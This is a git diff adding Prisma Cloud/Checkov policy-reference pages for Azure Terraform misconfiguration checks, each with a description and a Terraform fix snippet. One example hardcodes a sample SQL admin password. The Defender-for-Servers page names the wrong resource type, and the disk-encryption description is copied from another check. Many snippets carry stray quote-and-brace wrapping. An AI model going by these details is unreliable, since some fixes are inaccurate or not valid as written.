https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py[CKV_AZURE_88] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The content directory of an app service should be located on an Azure file share. +The storage account information for the file share must be provided before any publishing activity. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* storage_account.type + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... + + storage_account { + name = "test_name" + + type = "AzureFiles" + ... + } + + }", +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automatic-os-image-patching-is-enabled-for-virtual-machine-scale-sets.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automatic-os-image-patching-is-enabled-for-virtual-machine-scale-sets.adoc new file mode 100644 index 000000000..6e8928a52 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automatic-os-image-patching-is-enabled-for-virtual-machine-scale-sets.adoc @@ -0,0 +1,53 @@ +== Automatic OS image patching is disabled for Virtual Machine scale sets + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a7575f87-132a-44f9-bb75-a32c8fede437 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py[CKV_AZURE_95] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy enforces enabling automatic OS image patching on Virtual Machine Scale Sets to always keep Virtual Machines secure by safely applying latest security patches every month. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_virtual_machine_scale_set +* *Arguments:* automatic_os_upgrade + + +[source,go] +---- +{ + " resource "azurerm_virtual_machine_scale_set" "example" { + ... + + automatic_os_upgrade = true + ... + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automation-account-variables-are-encrypted.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automation-account-variables-are-encrypted.adoc new file mode 100644 index 000000000..99dd894e0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automation-account-variables-are-encrypted.adoc @@ -0,0 +1,69 @@ +== Azure Automation account variables are not encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fe857a62-4d04-4429-bd45-e502ccbd5c8d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AutomationEncrypted.py[CKV_AZURE_73] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +If you have Automation Account Variables storing sensitive data that are not already encrypted, then you will need to delete them and recreate them as encrypted variables. +//// +=== Fix - Runtime + + +* In Azure CLI* + + + + +[source,text] +---- +{ + "Set-AzAutomationVariable -AutomationAccountName '{AutomationAccountName}' -Encrypted $true -Name '{VariableName}' -ResourceGroupName '{ResourceGroupName}' -Value '{Value}'", +} +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_automation_variable_int +* *Arguments:* encrypted + + +[source,go] +---- +{ + "resource "azurerm_automation_variable_int" "example" { + ... ++ encrypted = true +}", + + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-active-directory-admin-is-configured.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-active-directory-admin-is-configured.adoc new file mode 100644 index 000000000..140673edb --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-active-directory-admin-is-configured.adoc @@ -0,0 +1,88 @@ +== Azure SQL servers which doesn't have Azure Active Directory admin configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 22c0440e-dadc-4368-ac9a-404edc6417cd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml[CKV2_AZURE_7] + +|Severity +|LOW + +|Subtype +|Build +//,Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use Azure Active Directory Authentication for authentication with SQL Database. +Azure Active Directory authentication is a mechanism to connect to Microsoft Azure SQL Database and SQL Data Warehouse by using identities in Azure Active Directory (Azure AD). +With Azure AD authentication, identities of database users and other Microsoft services can be managed in one central location. +Central ID management provides a single place to manage database users and simplifies permission management. +* It provides an alternative to SQL Server authentication. +* Helps stop the proliferation of user identities across database servers. +* Allows password rotation in a single place. +* Customers can manage database permissions using external (AAD) groups. +* It can eliminate storing passwords by enabling integrated Windows authentication and other forms of authentication supported by Azure Active Directory. +* Azure AD authentication uses contained database users to authenticate identities at the database level. +* Azure AD supports token-based authentication for applications connecting to SQL Database. +* Azure AD authentication supports ADFS (domain federation) or native user/password authentication for a local Azure Active Directory without domain synchronization. +* Azure AD supports connections from SQL Server Management Studio that use Active Directory Universal Authentication, which includes Multi-Factor Authentication (MFA). +MFA includes strong authentication with a range of easy verification options -- phone call, text message, smart cards with pin, or mobile app notification. + +//=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_sql_server, azurerm_sql_active_directory_administrator +* *Arguments:* server_name (of azurerm_sql_active_directory_administrator) + + +[source,go] +---- +{ + "data "azurerm_client_config" "current" {} + +resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_sql_server" "sql_server_good" { + name = "mysqlserver" + resource_group_name = azurerm_resource_group.example.name + location = azurerm_resource_group.example.location + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + + +resource "azurerm_sql_active_directory_administrator" "example" { ++ server_name = azurerm_sql_server.sql_server_good.name + resource_group_name = azurerm_resource_group.example.name + login = "sqladmin" + tenant_id = data.azurerm_client_config.current.tenant_id + object_id = data.azurerm_client_config.current.object_id +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-batch-account-uses-key-vault-to-encrypt-data.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-batch-account-uses-key-vault-to-encrypt-data.adoc new file mode 100644 index 000000000..17c6b6310 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-batch-account-uses-key-vault-to-encrypt-data.adoc @@ -0,0 +1,55 @@ +== Azure Batch account does not use key vault to encrypt data + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7a43a61b-ebce-4d88-a9d5-90d6affb1431 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py[CKV_AZURE_76] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use customer-managed keys to manage the encryption at rest of your Batch account data. +By default, customer data is encrypted with service-managed keys, but customer-managed keys are commonly required to meet regulatory compliance standards. +Customer-managed keys enable the data to be encrypted with an Azure Key Vault key created and owned by you. +You have full control and responsibility for the key lifecycle, including rotation and management. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_batch_account +* *Arguments:* key_vault_reference + + +[source,go] +---- +resource "azurerm_batch_account" "example" { + ... ++ key_vault_reference { + id = "test" + url = "https://test.com" + } + } +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-encryption-at-rest-uses-a-customer-managed-key.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-encryption-at-rest-uses-a-customer-managed-key.adoc new file mode 100644 index 000000000..702ccc9a0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-encryption-at-rest-uses-a-customer-managed-key.adoc @@ -0,0 +1,74 @@ +== Azure Data Explorer encryption at rest does not use a customer-managed key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f62f5111-f43b-442f-93fd-1b9b5625392d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml[CKV2_AZURE_11] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling encryption at rest using a customer-managed key on your Azure Data Explorer cluster provides additional control over the key being used by the encryption at rest. +This feature is often applicable to customers with special compliance requirements and requires a Key Vault to managing the keys. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kusto_cluster, azurerm_kusto_cluster_customer_managed_key +* *Arguments:* cluster_id (of _azurerm_kusto_cluster_customer_managed_key_ ) + + +[source,go] +---- +{ + "resource "azurerm_kusto_cluster" "cluster_ok" { + name = "kustocluster" + location = azurerm_resource_group.rg.location + resource_group_name = azurerm_resource_group.rg.name + + sku { + name = "Standard_D13_v2" + capacity = 2 + } + + + identity { + type = "SystemAssigned" + } + +} + +resource "azurerm_kusto_cluster_customer_managed_key" "example" { + cluster_id = azurerm_kusto_cluster.cluster_ok.id + key_vault_id = azurerm_key_vault.example.id + key_name = azurerm_key_vault_key.example.name + key_version = azurerm_key_vault_key.example.version +} + + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-disk-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-disk-encryption.adoc new file mode 100644 index 000000000..6989954d0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-disk-encryption.adoc @@ -0,0 +1,53 @@ +== Azure Data Explorer does not use disk encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| dcdc7713-2f14-447b-a8ce-9fe991e1a71c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py[CKV_AZURE_74] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling encryption at rest using a customer-managed key on your Azure Data Explorer cluster provides additional control over the key being used by the encryption at rest. +This feature is often applicable to customers with special compliance requirements and requires a Key Vault to managing the keys. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kusto_cluster +* *Arguments:* enable_disk_encryption + + +[source,go] +---- +{ + "resource "azurerm_kusto_cluster" "example" { + ... + + enable_disk_encryption = true +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-double-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-double-encryption.adoc new file mode 100644 index 000000000..1645fb659 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-double-encryption.adoc @@ -0,0 +1,53 @@ +== Azure Data Explorer does not use double encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5baf83d2-8762-4269-aebd-5c3663652da0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py[CKV_AZURE_75] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling double encryption helps protect and safeguard your data to meet your organizational security and compliance commitments. +When double encryption has been enabled, data in the storage account is encrypted twice, once at the service level and once at the infrastructure level, using two different encryption algorithms and two different keys. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kusto_cluster +* *Arguments:* double_encryption_enabled + + +[source,go] +---- +{ + "resource "azurerm_kusto_cluster" "example" { + ... ++ double_encryption_enabled = true +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factories-are-encrypted-with-a-customer-managed-key.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factories-are-encrypted-with-a-customer-managed-key.adoc new file mode 100644 index 000000000..99c52ba9b --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factories-are-encrypted-with-a-customer-managed-key.adoc @@ -0,0 +1,64 @@ +== Azure data factories are not encrypted with a customer-managed key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 76436a36-e177-400f-8a7b-9d116f4d9340 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml[CKV2_AZURE_15] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use customer-managed keys to manage the encryption at rest of your Azure Data Factory. +By default, customer data is encrypted with service-managed keys, but customer-managed keys are commonly required to meet regulatory compliance standards. +Customer-managed keys enable the data to be encrypted with an Azure Key Vault key created and owned by you. +You have full control and responsibility for the key lifecycle, including rotation and management. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_data_factory, azurerm_data_factory_linked_service_key_vault +* *Arguments:* data_factory_name (of _azurerm_data_factory_linked_service_key_vault_ ) + + +[source,go] +---- +{ + "resource "azurerm_data_factory" "data_factory_good" { + name = "example" + location = "location" + resource_group_name = "group" +} + + +resource "azurerm_data_factory_linked_service_key_vault" "factory_good" { + name = "example" + resource_group_name = "example" + data_factory_name = azurerm_data_factory.data_factory_good.name + key_vault_id = "123456" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factory-uses-git-repository-for-source-control.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factory-uses-git-repository-for-source-control.adoc new file mode 100644 index 000000000..ad8f0e722 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factory-uses-git-repository-for-source-control.adoc @@ -0,0 +1,58 @@ +== Azure Data Factory does not use Git repository for source control + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0bebac00-c052-496f-b226-3cfddcc71c9c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py[CKV_AZURE_103] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Data Factory is an ETL service for serverless data integration and data transformation. Git is a version control system that allows for easier change tracking and collaboration. + +Azure Data Factory allows you to configure a Git repository with either Azure Repos or GitHub. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_data_factory +* *Arguments:* github_configuration - (Optional) A github_configuration block as defined below. + + +[source,go] +---- +resource "azurerm_data_factory" "example" { + .... + github_configuration { + account_name = "${var.account_name}" + branch_name = "${var.branch_name}" + git_url = "${var.git_url}" + repository_name = "${var.repository_name}" + root_folder = "${var.root_folder}" + } + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-app-service.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-app-service.adoc new file mode 100644 index 000000000..b86aacfb0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-app-service.adoc @@ -0,0 +1,57 @@ +== Azure Microsoft Defender for Cloud is set to Off for App Service + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8953512c-4b2f-4622-a3c8-fff004bfec66 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py[CKV_AZURE_61] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes and agent-based deployment to analyze signals from Azure network fabric and the service control plane, to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for App Service detects attacks targeting applications running over App Service. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `AppServices` is declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers.adoc new file mode 100644 index 000000000..094759739 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers.adoc @@ -0,0 +1,57 @@ +== Azure Microsoft Defender for Cloud is set to Off for Azure SQL Databases + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c3f78c20-8967-47a0-a02b-1efc3810c666 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py[CKV_AZURE_69] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes and agent-based deployment to analyze signals from Azure network fabric and the service control plane, to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for SQL servers on machines extends the protections for your Azure-native SQL Servers to fully support hybrid environments and protect SQL servers (all supported version) hosted in Azure + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `SqlServers` and `SqlServerVirtualMachines` are declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-container-registries.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-container-registries.adoc new file mode 100644 index 000000000..77891d85b --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-container-registries.adoc @@ -0,0 +1,56 @@ +== Azure Microsoft Defender for Cloud is set to Off for Container Registries + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| be240ec3-9d49-4f6b-a40c-fd1bf1bf0783 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py[CKV_AZURE_86] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes and agent-based deployment to analyze signals from Azure network fabric and the service control plane, to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for container registries includes a vulnerability scanner to scan the images in Azure Resource Manager-based Azure Container Registry registries and provide deeper visibility image vulnerabilities. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `ContainerRegistry` is declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-key-vault.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-key-vault.adoc new file mode 100644 index 000000000..50dc3412a --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-key-vault.adoc @@ -0,0 +1,57 @@ +== Azure Microsoft Defender for Cloud is set to Off for Key Vault + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9706338d-291b-4937-be1e-752e251ac5a7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py[CKV_AZURE_87] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes and agent-based deployment to analyze signals from Azure network fabric and the service control plane, to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender detects unusual and potentially harmful attempts to access or exploit Key Vault accounts. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `KeyVaults` is declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-kubernetes.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-kubernetes.adoc new file mode 100644 index 000000000..180ce581c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-kubernetes.adoc @@ -0,0 +1,56 @@ +== Azure Security Center Defender set to Off for Kubernetes + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f44b3781-8c35-4166-8772-36e61c5314e6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py[CKV_AZURE_85] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes and agent-based deployment to analyze signals from Azure network fabric and the service control plane, to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for Kubernetes provides cluster-level threat protection by monitoring your AKS-managed services through the logs retrieved by Azure Kubernetes Service (AKS). + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `KubernetesService` is declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-servers.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-servers.adoc new file mode 100644 index 000000000..bb9b99c63 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-servers.adoc @@ -0,0 +1,58 @@ +== Azure Microsoft Defender for Cloud is set to Off for Servers +// Azure Microsoft Defender for Cloud disabled for Servers + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| eb5f5af1-754d-4f6b-9c08-610a6974db16 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py[CKV_AZURE_55] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes and agent-based deployment to analyze signals from Azure network fabric and the service control plane, to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for servers adds threat detection and advanced defenses for Windows and Linux machines. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `SqlServers` is declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines.adoc new file mode 100644 index 000000000..3b34eb00e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines.adoc @@ -0,0 +1,55 @@ +== Azure Microsoft Defender for Cloud is set to Off for SQL servers on machines + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1f3ae628-17bf-4d0b-b2d1-a0fbb61bf19c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py[CKV_AZURE_79] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes and agent-based deployment to analyze signals from Azure network fabric and the service control plane, to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for SQL servers on machines extends the protections for your Azure-native SQL Servers to fully support hybrid environments and protect SQL servers (all supported version) hosted in Azure. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. +Ensure that `SqlServers` and `SqlServerVirtualMachines` are declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-storage.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-storage.adoc new file mode 100644 index 000000000..90b215b4e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-storage.adoc @@ -0,0 +1,58 @@ +== Azure Microsoft Defender for Cloud is set to Off for Storage +// Azure Microsoft Defender for Cloud disabled for Storage + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5436f3cc-3815-44f4-ac09-b8418e1f8e1d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py[CKV_AZURE_84] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes and agent-based deployment to analyze signals from Azure network fabric and the service control plane, to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for Storage detects unusual and potentially harmful attempts to access or exploit storage accounts. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `StorageAccounts` is declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-app-services.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-app-services.adoc new file mode 100644 index 000000000..5fed94d12 --- /dev/null +++ 